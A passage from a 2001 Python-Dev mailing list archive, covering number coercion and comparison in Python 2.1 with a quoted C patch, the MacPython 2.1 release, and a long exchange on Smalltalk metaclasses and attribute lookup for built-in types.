sometimes not work correctly unless the absolute > + path is used. If GetFullPathName() fails, the LoadLibrary > + will certainly fail too, so use its error code */ > + if (GetFullPathName(pathname, > + sizeof(pathbuf), > + pathbuf, > + &dummy)) > + /* XXX This call doesn't exist in Windows CE */ > + hDLL = LoadLibraryEx(pathname, NULL, > + LOAD_WITH_ALTERED_SEARCH_PATH); > if (hDLL==NULL){ > char errBuf[256]; > unsigned int errorCode; -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Tue May 1 23:22:11 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Tue, 01 May 2001 23:22:11 +0200 Subject: [Python-Dev] Coercion and comparison of numbers Message-ID: <3AEF2903.79308F55@lemburg.com> I just received a bug report for mx.Number which revealed a probelm with the comparison code in Python 2.1. Looking at the code it seems that one of my original coercion patches did not make it into the core. I added a new API PyNumber_Compare() knows about the new coercion mechanism and should be called for numbers instead of trying coercion in PyObject_Compare(). Was this part of the coercion patch left out on purpose or a simple oversight ? I hope the latter... -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From jack at oratrix.nl Tue May 1 23:23:59 2001 From: jack at oratrix.nl (Jack Jansen) Date: Tue, 1 May 2001 23:23:59 +0200 (MET DST) Subject: [Python-Dev] MacPython 2.1 released Message-ID: <20010501212359.792FADDDF0@oratrix.oratrix.nl> MacPython 2.1 is available for download. Get it via http://www.cwi.nl/~jack/macpython.html . Python is a high-level programming language that is suitable for simple scripting tasks as well as writing large applications. MacPython offers alot of Mac-specific extensions, including access to all major MacOS Toolbox modules (QuickDraw, QuickTime, AppleScript and many more), an Integrated Development Environment (in Python!), frameworks for windowing applications, unix-compatible cgi-scripting, image-manipulation libraries, numerical libraries, tk-based machine independent windowing and lots more. It also uniquely among Pythons allows you to create fully selfcontained (and, hence, distributable) applications without needing a C compiler or anything. New in this version: - A choice of Carbon or Classic runtime, so runs on anything between MacOS 8.1 and MacOS X - Distutils support for easy installation of extension packages - BBedit language plugin - All the platform-independent Python 2.1 mods - New version of Numeric - Lots of bug fixes - Choice of normal and active installer Please send feedback on this release to pythonmac-sig at python.org, where all the MacPythoneers hang out. Enjoy, -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From guido at digicool.com Wed May 2 02:52:29 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 01 May 2001 19:52:29 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk Message-ID: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> Jim Althoff (a big commercial user of J[P]ython) sent me a summary of how metaclasses work in Smalltalk. He should know, since he invented them! :-) I include it below, with his permission. While implementing more class-like behavior for built-in types in the experimental descr-branch in the 2.2 CVS tree, I've noticed problems caused by Python's collapsing of class attributes and instance attributes. For example, suppose d is a dictionary. My experimental changes make d.__class__ return DictType (from the types module). (DictType.__class__ is TypeType, by the way.) I also added special methods. For example, d.__repr__() now returns repr(d). I am preparing for subclassing of built-in types, so I will eventually be able to derive a class MyDictType from DictType, as follows: class MyDictType(DictType): ... Now comes the fun part. Suppose MyDictType wants to define its own repr(): class MyDictType(DictType): def __repr__(self): return "MyDictType(%s)" % DictType.__repr__(self) But, (surprise, surprise!), DictType itself also has a __repr__() method: it returns the string "". So the above code would fail: DictType.__repr__() returns repr(DictType), and DictType.__repr__(self) raises an argument count error. The correct __repr__ method for dictionary objects can be found as DictType.__dict__['__repr__'], but that looks hideous! What to do? Pragmatically, I can make DictType.__repr__ return DictType.__dict__['__repr__'], and all will be well in this example. But we have to tread carefully here: DictType.__class__ is TypeType, but DictType.__dict__['__class__'] is a descriptor for the __class__ attribute on dictionary objects. The best rule I can think of so far is that DictType.__dict__ gives the *true* set of attribute descriptors for dictionary objects, and is thus similar to Smalltalks's class.methodDict that Jim describes below. DictType.foo is a shortcut that can resolve to either DictType.__dict__['foo'] or to an attribute (maybe a method) of DictType described in TypeType.__dict__['foo'], whichever is defined. If both are defined, I propose the following, clumsy but backwards compatible rule: if DictType.__dict__['foo'] describes a method, it wins. Otherwise, TypeType.__dict__['foo'] wins. Sigh. --Guido van Rossum (home page: http://www.python.org/~guido/) ------------------------- Jim Althoff's message --------------------------- Hi Guido, I was reading the discussion on class methods in the python-dev archive and noticed your question about how Smalltalk determines the difference between instance methods and class methods. I have some info on this which I can't post to python-dev, not being a member; but I thought you might be interested in it anyway. It turns out that I am the one that devised metaclasses in Smalltalk-80. (On the other hand, I haven't looked at any Smalltalk implementation code in a long time so this is merely a description of how it all started.) Basically (I think) Smalltalk doesn't have the ambiguity you mention for instance methods versus class methods (as Python would) because Smalltalk doesn't do method lookup the same as Python does. To illustrate, suppose you have object.method() (using Python-style syntax) The Smalltalk method lookup is as follows: o find the class that object is an instance of -- this resulting thing is a "class object" (a first-class object, same as in Python) o since class is a "class object" one of its fields will be a dict of methods -- let's call it class.methodDict o find method in class.methodDict o if found, execute method on object o if not, do the same thing traversing the (single inheritance) superclass chain (follow class.superClass) I believe Python works roughly as follows (Just testing my own understanding here -- correct me if I don't get it right): o convert (conceptually at least) object.method() into object. __class__.method(object) o find a _function_ corresponding to method in object.__class__.__dict__ o if found, execute the found function (with object bound as the first arg to function) o if not, traverse the (multiple inheritance) superclass chain (depth first) I think the key difference is that Python treats object.method() the same as it treats object.__class__.method(object). Smalltalk doesn't do this. In Smalltalk, object.__class__.method(object) would mean: o consider object.__class__ to be an "object" like any other "object" in Smalltalk (which it is) o get the "class object" of object.__class__ , namely object. __class__.class__ o find method in object.__class__.__class__.methodDict o if found, execute the method on object.__class__ o if not, do the same thing traversing the (single inheritance) superclass chain (follow object.__class__.__class__.superClass) In other words, it exactly the same lookup mechanism. So there is no ambiguity. To summarize, in Smalltalk: o instance methods (for instances that are not "class objects") are specified by: instance.instanceMethod() o class methods are specified by: class.classMethod() o both of these are just object.objectMethod() since classes are objects and the method lookup mechanism is no different from that of any other kind of object. A concrete example: If I have a class Date in Smalltalk and an instance of it referenced by variable, d. I would do: o d.followingDate() for an instance method, and o Date.currentDate() for a class method I think this is a nice, conceptually simple model. Things get interesting, though, when you start to consider how the mechanism of class. __class__ -- which is the thing that makes class methods no different than instance methods -- actually works. And this leads to metaclasses in Smalltalk. Here's a rough sketch of how metaclasses work: Standard principles of Smalltalk: o everything is an object (first-class) o every object is an instance of a class o a class inherits (single-inheritance) from its superclass (except the root class Object, which has no superclass) o methods can be invoked on a object. All such methods are defined as part of the object's class definition (or a class going up the superclass chain) Because of the first 2 principles above: o every class is an object (because everything is an object) o every class is, itself, an instance of some class (because every object is an instance of a class) Originally in Smalltalk-76, there was one metaclass, Class. All classes (class objects) were instances of Class. Class was an instance of itself. Class had methods defined for it just like all classes did. In particular, it had a method "new" -- this being the method that creates instances of classes. So suppose you had class Rectangle. Rectangle is an instance of Class (hence it is a class object). If you wanted to create an instance of Rectangle, you would do: myRect = Rectangle.new(). This would mean: "find the 'new' method in the definition of Rectangle's class (Class) and invoke it on Rectangle (which is a class object). The result is a Rectangle instance which is assigned to the variable myRect. The Rectangle class object held data (state -- same rules as any other kind of object) -- such as number and name of fields its instances would have, a dictionary of methods for its instances, etc. So the "new" method in Class would have access to all the info it needed to create a Rectangle instance (as opposed to a Point instance, for example). The limitation with this scheme was that all classes had to share exactly the same methods, namely all the methods defined in Class. The method "new" was one of these methods along with lots of "reflection-type" methods for class creation, modification, and inspection. But if you wanted an "application-oriented" class method -- like Date.currentDate() -- you couldn't do that because then the method "currentDate" would be shared amongst all class objects (instances of Class) and wouldn't make any sense (e.g., Rectangle.currentDate()). In Smalltalk-80 I added a more flexible mechanism which we called metaclasses (we hadn't used that terminology previously for the single Class although it was a "metaclass"). The thing that everyone in the Smalltalk development team liked about the new metaclass mechanism at the time was that it didn't require any new basic principles for Smalltalk. It was all done using the same basic principles of Smalltalk listed above. The idea was to use subclassing to allow for different methods for different instances of Class. A "metaclass" simply became a subclass of Class. Each class object then ended up being a singleton instance (although the "singleton-ness" was not mandatory) of a metaclass (i.e., a subclass of Class). So class objects were no longer _all_ instances of the _same_ class (Class). Each was an instance of a corresponding subclass of Class -- that is to say, an instance of a metaclass. The Smalltalk-80 class hierarchy looked like the following: (This is actually a simplification. The actually hierarchy has a little more factoring and I changed the names for more clarity). First a digression on some terminology: o a class is an object that can be instantiated o a metaclass is a class and one such that when it is instantiated, the instanced is itself a class o a plain-object is one that cannot be instantiated (I'm just making this term up). o a plain-class is one that is a class but is not a metaclass (making this up, too). In the list below, indentation indicates class hieararchy (superclass -- subclass) plain-class ---------------- o Class o Object isInstanceOf o ObjectMetaClass isInstanceOf MetaClass o Class isInstanceOf o ClassMetaClass isInstanceOf MetaClass o MetaClass isInstanceOf o MetaClassMetaClass isInstanceOf MetaClass . . . o Rectangle isInstanceOf o RectangleMetaClass isInstanceOf MetaClass o SpecializedRectangle isInstanceOf o SpecializedRectangleMetaClass isInstanceOf MetaClass All "metaclasses" are instances of MetaClass. All "plain-classes" (those that are not "metaclasses") are instances of a "metaclass". Because of this there are parallel class hierarchies between "plain-classes" and their corresponding "metaclasses". Note that MetaClass is a "plain-class" and not a "metaclass". Also note that MetaClass (being a "plain-class") is an instance of its corresponding "metaclass" MetaClassMetaClass. And MetaClassMetaClass is an instance of MetaClass (because MetaClassMetaClass _is_ a "metaclass"). The MetaClass / MetaClassMetaClass class/instance relationship is circular. An example. If you want a Rectangle class you first make a metaclass for it, RectangleMetaClass -- actually, the system does this for you automatically as part of the class creation method implementation (when you define the class Rectangle, for example). RectangleMetaClass is an instance of MetaClass so all the methods defined in MetaClass are available to it. RectangleMetaClass can also define its own methods now (because it is a class) which would be invoked on any (typically one) instance of RectangleMetaClass, which in this case is going to be class Rectangle. You then make your Rectangle class by making an instance of RectangleMetaClass (conceptually doing: Rectangle = RectangleMetaClass.new() ). Now you can make instances of Rectangle, doing: myRect = Rectangle.new() as before. This is not so different from the Smalltalk-76 mechanism. The main advantage is that you now have a specific class, RectangleMetaClass, that can have methods specific to the class Rectangle (the instance of RectangleMetaClass). So you could define a method like "newFromPointToPoint" for example and then do: myRect = Rectangle.newFromPointToPoint(point1,point2). The meaning is the same as always: take the variable "Rectangle", find out what it is pointing to. It is pointing to an instance of the RectangleMetaClass. Find the method "newFromPointToPoint" as part of the definition of RectangleMetaClass (it being a class object). Invoke this method on the Rectangle class object -- which then creates a Rectangle instance. The same would go for the other example: Date.currentDate(). So the bottom line is (I think) that the Smalltalk method lookup mechanism doesn't have to resolve an ambiguity because all methods that get invoked on an object always come from the object's definition class (or superclass) and from no other place. Hope this helps, Jim From guido at digicool.com Wed May 2 03:29:28 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 01 May 2001 20:29:28 -0500 Subject: [Python-Dev] Coercion and comparison of numbers In-Reply-To: Your message of "Tue, 01 May 2001 23:22:11 +0200." <3AEF2903.79308F55@lemburg.com> References: <3AEF2903.79308F55@lemburg.com> Message-ID: <200105020129.UAA24690@cj20424-a.reston1.va.home.com> > I just received a bug report for mx.Number which revealed a > probelm with the comparison code in Python 2.1. Looking at > the code it seems that one of my original coercion patches > did not make it into the core. I added a new API PyNumber_Compare() > knows about the new coercion mechanism and should be called for > numbers instead of trying coercion in PyObject_Compare(). > > Was this part of the coercion patch left out on purpose or > a simple oversight ? I hope the latter... Hard to say. I don't think I paid very close attention to your patch; Neil did, but I changed a lot of the code around coercions and comparisons in order to implement rich comparisons. So, several things may have happened: Neil lost it; Neil decided against it; or I ripped it out. Can you elucidate me regarding the issues? (If there's code, please quote it or link to a specific patch.) Since the concept of "number" is ill-defined at best, when exactly should PyNumber_Compare() be called? What is it supposed to do? Does it need a rich cousin? --Guido van Rossum (home page: http://www.python.org/~guido/) From nas at python.ca Wed May 2 02:42:15 2001 From: nas at python.ca (Neil Schemenauer) Date: Tue, 1 May 2001 17:42:15 -0700 Subject: [Python-Dev] Coercion and comparison of numbers In-Reply-To: <200105020129.UAA24690@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Tue, May 01, 2001 at 08:29:28PM -0500 References: <3AEF2903.79308F55@lemburg.com> <200105020129.UAA24690@cj20424-a.reston1.va.home.com> Message-ID: <20010501174215.A9565@glacier.fnational.com> [MAL] > I just received a bug report for mx.Number which revealed a > probelm with the comparison code in Python 2.1. Looking at > the code it seems that one of my original coercion patches > did not make it into the core. I added a new API PyNumber_Compare() > knows about the new coercion mechanism and should be called for > numbers instead of trying coercion in PyObject_Compare(). I remember the API. I don't remember what happened to it. Guido might have dropped it or I might have taken it out thinking the comparison issues would be sorted out by Guido. Why is a new API needed? Why can't PyObject_Compare() do the right thing (ie. not coerce new style numbers)? Neil From guido at digicool.com Wed May 2 03:55:59 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 01 May 2001 20:55:59 -0500 Subject: [Python-Dev] Slight wart in __all__ In-Reply-To: Your message of "Sun, 29 Apr 2001 12:14:43 +1000." References: Message-ID: <200105020155.UAA25687@cj20424-a.reston1.va.home.com> > Would it make sense to a explicitly raise a more meaningful exception here > if __all__ doesnt contain strings? Definitely. Be my guest. --Guido van Rossum (home page: http://www.python.org/~guido/) From greg at cosc.canterbury.ac.nz Wed May 2 03:22:47 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Wed, 02 May 2001 13:22:47 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> Message-ID: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> Guido: > If both are defined, I propose the following, clumsy but backwards > compatible rule: if DictType.__dict__['foo'] describes a method, it > wins. Otherwise, TypeType.__dict__['foo'] wins. Yeek! I think that's far too confusing a rule. I suppose it might do in the meantime, but we'd better have a long term solution in mind before going too far down this route. Ultimately it seems like we'll have to introduce a separate namespace for methods and default instance attributes, say __classdict__. Then lookup of x.foo would look first in x.__dict__, then x.__class__.__classdict__, etc up the inheritance chain. Then we'll have to resolve the ambiguity of the class.foo syntax. The bravest way would be simply to change the syntax for getting unbound methods. The most common use for these seems to be for calling inherited methods, so perhaps something like inherited MyBaseClass.foo(arg, ...) which would be equivalent to getmethod(MyBaseClass, 'foo')(self, arg, ...) where getmethod() is a new builtin like getattr() except that it looks in the __classdict__, and 'self' is really whatever the first argument of the containing method was. Now that we have __future__, would such a change be contemplatable? Or is it too radical to even think about? Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From guido at digicool.com Wed May 2 04:48:43 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 01 May 2001 21:48:43 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 13:22:47 +1200." <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> Message-ID: <200105020248.VAA30315@cj20424-a.reston1.va.home.com> > Guido: > > > If both are defined, I propose the following, clumsy but backwards > > compatible rule: if DictType.__dict__['foo'] describes a method, it > > wins. Otherwise, TypeType.__dict__['foo'] wins. Greg Ewing: > Yeek! I think that's far too confusing a rule. I suppose > it might do in the meantime, but we'd better have a long > term solution in mind before going too far down this > route. I agree 100%. I had to do something quick to be able to make progress with my PEP 252 project, but it's a clear indication that there's a problem! > Ultimately it seems like we'll have to introduce a separate > namespace for methods and default instance attributes, > say __classdict__. Then lookup of x.foo would look > first in x.__dict__, then x.__class__.__classdict__, > etc up the inheritance chain. Except that sometimes you really do want x.__class__.__classdict__ to have priority (e.g. for "guarded" attributes). > Then we'll have to resolve the ambiguity of the class.foo > syntax. The bravest way would be simply to change the syntax > for getting unbound methods. Agreed again. > The most common use for these seems to be for calling > inherited methods, so perhaps something like > > inherited MyBaseClass.foo(arg, ...) > > which would be equivalent to > > getmethod(MyBaseClass, 'foo')(self, arg, ...) > > where getmethod() is a new builtin like getattr() > except that it looks in the __classdict__, and 'self' > is really whatever the first argument of the containing > method was. The second most common use is to reference class variables (e.g. imagine a class that keeps counters of how many instances have been created and deleted in C.initcount and C.delcount). But these should not have to change, since they really are class attributes. > Now that we have __future__, would such a change be contemplatable? > Or is it too radical to even think about? If we can find a way to spell "super.method", we should be ready for the future. I can't think of something right off the bat unfortunately. But the issue of backwards compatibility is a big one here: the idioms for calling base class methods and using class variables as defaults for instance variables are so common that we will have to support these for many future versions! (Two things I am not looking forward to: fixing all the Zope code that uses this, and telling the author of Programming Python, 2nd. ed.) --Guido van Rossum (home page: http://www.python.org/~guido/) From greg at cosc.canterbury.ac.nz Wed May 2 04:48:20 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Wed, 02 May 2001 14:48:20 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105020248.VAA30315@cj20424-a.reston1.va.home.com> Message-ID: <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> Guido: > Except that sometimes you really do want x.__class__.__classdict__ to > have priority (e.g. for "guarded" attributes). What's a "guarded" attribute? > But the issue of backwards compatibility is a big one here I was thinking that, while this is still in the __future__, the __dict__ attribute would be a pseudo-dict that, by default, behaves like the union of the old __dict__ and the __classdict__. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From mal at lemburg.com Wed May 2 09:59:03 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 09:59:03 +0200 Subject: [Python-Dev] Coercion and comparison of numbers References: <3AEF2903.79308F55@lemburg.com> <200105020129.UAA24690@cj20424-a.reston1.va.home.com> <20010501174215.A9565@glacier.fnational.com> Message-ID: <3AEFBE47.A847C5D2@lemburg.com> Neil Schemenauer wrote: > > [MAL] > > I just received a bug report for mx.Number which revealed a > > probelm with the comparison code in Python 2.1. Looking at > > the code it seems that one of my original coercion patches > > did not make it into the core. I added a new API PyNumber_Compare() > > knows about the new coercion mechanism and should be called for > > numbers instead of trying coercion in PyObject_Compare(). > > I remember the API. I don't remember what happened to it. Guido > might have dropped it or I might have taken it out thinking the > comparison issues would be sorted out by Guido. Good; so there's a chance for getting it back in :-) > Why is a new API needed? Why can't PyObject_Compare() do the > right thing (ie. not coerce new style numbers)? I think the reason for implementing number compares as separate API was to simply shift out code from PyObject_Compare() into a new function, not so much motivated by some higher level need to do number compares. [Guido] > > Was this part of the coercion patch left out on purpose or > > a simple oversight ? I hope the latter... > > Hard to say. I don't think I paid very close attention to your patch; > Neil did, but I changed a lot of the code around coercions and > comparisons in order to implement rich comparisons. So, several > things may have happened: Neil lost it; Neil decided against it; or I > ripped it out. > > Can you elucidate me regarding the issues? (If there's code, please > quote it or link to a specific patch.) Since the concept of "number" > is ill-defined at best, when exactly should PyNumber_Compare() be > called? What is it supposed to do? Does it need a rich cousin? The reasoning is simple: the coercion patches basically pass control over coercion down to the APIs in question and thus provide the type with more information to choose from. This is currently implemented in 2.1 for all number methods, but not for number comparisons which do have the same problems with centralized coercion as e.g. __add__ or other binary operators. Here's part of the original patch: --- Include/orig/abstract.h Wed May 13 00:28:58 1998 +++ Include/abstract.h Thu May 21 12:31:55 1998 @@ -447,11 +447,18 @@ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx This function always succeeds. */ - PyObject *PyNumber_Add Py_PROTO((PyObject *o1, PyObject *o2)); + PyObject *PyNumber_Compare Py_PROTO((PyObject *o1, PyObject *o2)); + + /* + Returns the result of comparing o1 and o2, or null on failure. + This is the equivalent of the Python expression: cmp(o1,o2). + */ + + PyObject *PyNumber_Add Py_PROTO((PyObject *o1, PyObject *o2)); /* Returns the result of adding o1 and o2, or null on failure. This is the equivalent of the Python expression: o1+o2. [...] } +/* Emulate old method for comparing numeric types using coercion and + tp_compare. If coercion doesn't work, we use the type names as + comparison basis (like PyObject_Compare() does too). */ + +static PyObject * +_PyNumber_OldstyleCompare(PyObject *v, + PyObject *w) +{ + int err; + + DPRINTF("_PyNumber_OldstyleCompare(%s at 0x%lx, %s at 0x%lx);\n", + v->ob_type->tp_name,(long)v, + w->ob_type->tp_name,(long)w); + err = PyNumber_CoerceEx(&v, &w); + if (err < 0) + return NULL; + else if (err == 0 && v->ob_type->tp_compare) { + int cmp; + + cmp = (*v->ob_type->tp_compare)(v, w); + /* XXX Test for errors ? Looks like C types cannot raise + exceptions in the compare slot... */ + Py_DECREF(v); + Py_DECREF(w); + DPRINTF(" compare slot returned: %i",cmp); + return PyInt_FromLong(cmp); + } + DPRINTF(" using type names for comparison\n"); + return PyInt_FromLong(strcmp(v->ob_type->tp_name, + w->ob_type->tp_name)); +} + +PyObject * +PyNumber_Compare(v, w) + PyObject *v, *w; +{ + DPRINTF("PyNumber_Compare(%s at 0x%lx, %s at 0x%lx);\n", + v->ob_type->tp_name,(long)v, + w->ob_type->tp_name,(long)w); + BINOP("__cmp__", "__rcmp__", PyNumber_Compare); + return _PyNumber_BinaryOperation(v,w, + NB_SLOT(nb_cmp), + "cmp()"); +} + [...] +static PyObject * +_PyNumber_BinaryOperation(PyObject *v, + PyObject *w, + const int op_slot, + const char *operation) +{ + PyNumberMethods *mv, *mw; + register PyObject *x; + register binaryfunc *slot; + int c; ... + /* When using old coercion, make sure that the requested slot + is available on old style numbers or use an emulation. */ + if (op_slot > NB_SLOT(nb_hex)) { + + /* Emulation hooks: */ + if (op_slot == NB_SLOT(nb_cmp)) + return _PyNumber_OldstyleCompare(v,w); + + goto badOperands; + } [...] int PyObject_Compare(v, w) PyObject *v, *w; { PyTypeObject *tp; @@ -291,27 +294,30 @@ PyObject_Compare(v, w) Py_DECREF(res); PyErr_SetString(PyExc_TypeError, "comparison did not return an int"); return -1; } - c = PyInt_AsLong(res); + c = PyInt_AS_LONG(res); Py_DECREF(res); return (c < 0) ? -1 : (c > 0) ? 1 : 0; } if ((tp = v->ob_type) != w->ob_type) { - if (tp->tp_as_number != NULL && - w->ob_type->tp_as_number != NULL) { - int err; - err = PyNumber_CoerceEx(&v, &w); - if (err < 0) + if (tp->tp_as_number != NULL || + w->ob_type->tp_as_number != NULL) { + PyObject *res; + int c; + res = PyNumber_Compare(v,w); + if (res == NULL) return -1; - else if (err == 0) { - int cmp = (*v->ob_type->tp_compare)(v, w); - Py_DECREF(v); - Py_DECREF(w); - return cmp; + if (!PyInt_Check(res)) { + PyErr_SetString(PyExc_TypeError, + "comparison did not return an int"); + return -1; } + c = PyInt_AS_LONG(res); + Py_DECREF(res); + return (c < 0) ? -1 : (c > 0) ? 1 : 0; } return strcmp(tp->tp_name, w->ob_type->tp_name); } if (tp->tp_compare == NULL) return (v < w) ? -1 : 1; -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Wed May 2 11:09:17 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 11:09:17 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> Message-ID: <3AEFCEBD.2E5979C9@lemburg.com> Guido van Rossum wrote: > > While implementing more class-like behavior for built-in types in the > experimental descr-branch in the 2.2 CVS tree, I've noticed problems > caused by Python's collapsing of class attributes and instance > attributes. > > For example, suppose d is a dictionary. My experimental changes make > d.__class__ return DictType (from the types module). > (DictType.__class__ is TypeType, by the way.) I also added special > methods. For example, d.__repr__() now returns repr(d). I am > preparing for subclassing of built-in types, so I will eventually be > able to derive a class MyDictType from DictType, as follows: > > class MyDictType(DictType): > ... > > Now comes the fun part. Suppose MyDictType wants to define its own > repr(): > > class MyDictType(DictType): > def __repr__(self): > return "MyDictType(%s)" % DictType.__repr__(self) > > But, (surprise, surprise!), DictType itself also has a __repr__() > method: it returns the string "". > > So the above code would fail: DictType.__repr__() returns > repr(DictType), and DictType.__repr__(self) raises an argument count > error. The correct __repr__ method for dictionary objects can be > found as DictType.__dict__['__repr__'], but that looks hideous! > > What to do? Pragmatically, I can make DictType.__repr__ return > DictType.__dict__['__repr__'], and all will be well in this example. > But we have to tread carefully here: DictType.__class__ is TypeType, > but DictType.__dict__['__class__'] is a descriptor for the __class__ > attribute on dictionary objects. > > The best rule I can think of so far is that DictType.__dict__ gives > the *true* set of attribute descriptors for dictionary objects, and is > thus similar to Smalltalks's class.methodDict that Jim describes > below. DictType.foo is a shortcut that can resolve to either > DictType.__dict__['foo'] or to an attribute (maybe a method) of > DictType described in TypeType.__dict__['foo'], whichever is defined. > If both are defined, I propose the following, clumsy but backwards > compatible rule: if DictType.__dict__['foo'] describes a method, it > wins. Otherwise, TypeType.__dict__['foo'] wins. I'm not sure I can follow you here: DictType.__repr__ is the representation method of the dictionary and not inherited from TypeType, so there should be no problem. The problem with the misleading error message would only show up in case DictType does not define a __repr__ method. Then the inherited one from TypeType would come into play and cause the problem you mention above. Thinking in terms of meta-classes, I believe we should implement this mechanism in the meta-class (TypeType in this case). Its __getattr__() will have to decide whether or not to expose its own methods and attributes or not. The only catch here is that currently instances and classes have control of whether and how to bind found functions as methods or not. We should probably change that to pass complete control over to the meta-class object and remove the special control flows currently found in instance_getattr2() and class_lookup(). In general, I think that meta-classes should not expose their attributes to the class objects they create, since this causes way to many problems. Perhaps I'm oversimplifying things here, but I have a feeling that we can go a long way by actually trying to see meta-classes as first class members in the interpreter design and moving all the binding and lookup mechanisms over to this object type. The special casing should then take place in the meta-class rather than its creations. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From thomas.heller at ion-tof.com Wed May 2 12:57:42 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 12:57:42 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> Message-ID: <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> > > The most common use for these seems to be for calling > > inherited methods, so perhaps something like > > > > inherited MyBaseClass.foo(arg, ...) > > > > which would be equivalent to > > > > getmethod(MyBaseClass, 'foo')(self, arg, ...) > > > > where getmethod() is a new builtin like getattr() > > except that it looks in the __classdict__, and 'self' > > is really whatever the first argument of the containing > > method was. > > The second most common use is to reference class variables > (e.g. imagine a class that keeps counters of how many instances have > been created and deleted in C.initcount and C.delcount). But these > should not have to change, since they really are class attributes. > > > Now that we have __future__, would such a change be contemplatable? > > Or is it too radical to even think about? > > If we can find a way to spell "super.method", we should be ready for > the future. I can't think of something right off the bat > unfortunately. Could we make super(self, MyBaseClass).foo(arg, ...) behave similar to MyBaseClass.foo(self, arg, ...) Wrapping this stuff in a function would probably also enable to use the same pattern in existing python versions. Thomas From thomas.heller at ion-tof.com Wed May 2 13:12:21 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 13:12:21 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> Message-ID: <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook> > Jim Althoff (a big commercial user of J[P]ython) sent me a summary of > how metaclasses work in Smalltalk. He should know, since he invented > them! :-) I include it below, with his permission. I found this very interesting reading. [From Jim Althoff] > In the list below, indentation indicates class hieararchy (superclass -- > subclass) The indentation, unfortunately, seems to be destroyed. > > plain-class > ---------------- > > o Class > o Object isInstanceOf > o ObjectMetaClass isInstanceOf MetaClass > o Class isInstanceOf > o ClassMetaClass isInstanceOf MetaClass > o MetaClass isInstanceOf > o MetaClassMetaClass isInstanceOf MetaClass > . . . > o Rectangle isInstanceOf > o RectangleMetaClass isInstanceOf MetaClass > o SpecializedRectangle isInstanceOf > o SpecializedRectangleMetaClass isInstanceOf MetaClass A question for Jim (this is more Smalltalk than Python related): How does the Behaviour class fit into this picture? Thhomas From guido at digicool.com Wed May 2 14:15:57 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 07:15:57 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 12:57:42 +0200." <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> Message-ID: <200105021215.HAA31939@cj20424-a.reston1.va.home.com> > > If we can find a way to spell "super.method", we should be ready for > > the future. I can't think of something right off the bat > > unfortunately. > > Could we make > > super(self, MyBaseClass).foo(arg, ...) > > behave similar to > > MyBaseClass.foo(self, arg, ...) > > Wrapping this stuff in a function would probably also > enable to use the same pattern in existing python versions. Yes, I can see how to write super() using current tools (or 1.5.2 even). The problem is that this makes super calls even more wordy than they already are! I can't think of anything that wouldn't require compiler support though. --Guido van Rossum (home page: http://www.python.org/~guido/) From gward at python.net Wed May 2 14:57:41 2001 From: gward at python.net (Greg Ward) Date: Wed, 2 May 2001 08:57:41 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105021215.HAA31939@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 02, 2001 at 07:15:57AM -0500 References: 